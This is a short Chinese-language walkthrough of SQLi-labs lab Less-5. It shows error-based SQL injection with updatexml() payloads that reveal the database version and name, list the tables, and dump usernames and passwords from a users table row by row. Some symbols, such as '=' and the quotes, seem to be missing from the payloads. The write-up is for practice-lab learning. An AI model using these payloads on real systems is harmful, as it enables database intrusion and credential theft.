less-5报错注入关于报错注入我在第三关简单的进行过一些解释师傅们可以去看我的第三关打法在这里不再进行过多的赘述。进入界面我们尝试进行注入,只给了这一个?id1 --后面的注入中我尝试了常见的sql参数闭合方式要么是报错要么就是给的上图的界面那么在这种情况下我们就要考虑是否是报错注入或者布尔盲注了数据库版本号及名称先尝试报错注入直接注入有反馈给的是版本号那就是报错注入了?id1 and updatexml(1,concat(0x7e,version(),0x7e),1) --再查看数据库名称注入数据库名称是security?id1 and updatexml(1,concat(0x7e,database(),0x7e),1) --爆表注入得到四个表名依旧查询users?id1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase())),1) --脱数据我们在报错注入中需要使用limit这个函数来帮助我们使用具体用法我在第三关的通关笔记中有写感兴趣的可以去看一下?id1 and updatexml(1,concat(0x7e,(select concat(username,:,password) from users limit 0,1)),1) --脱出来第一条数据脱第二条?id1 and updatexml(1,concat(0x7e,(select concat(username,:,password) from users limit 1,1)),1) --脱第三条?id1 and updatexml(1,concat(0x7e,(select concat(username,:,password) from users limit 3,1)),1) --后续再多的不再进行示范师傅们可以自己尝试进行脱完后面的数据。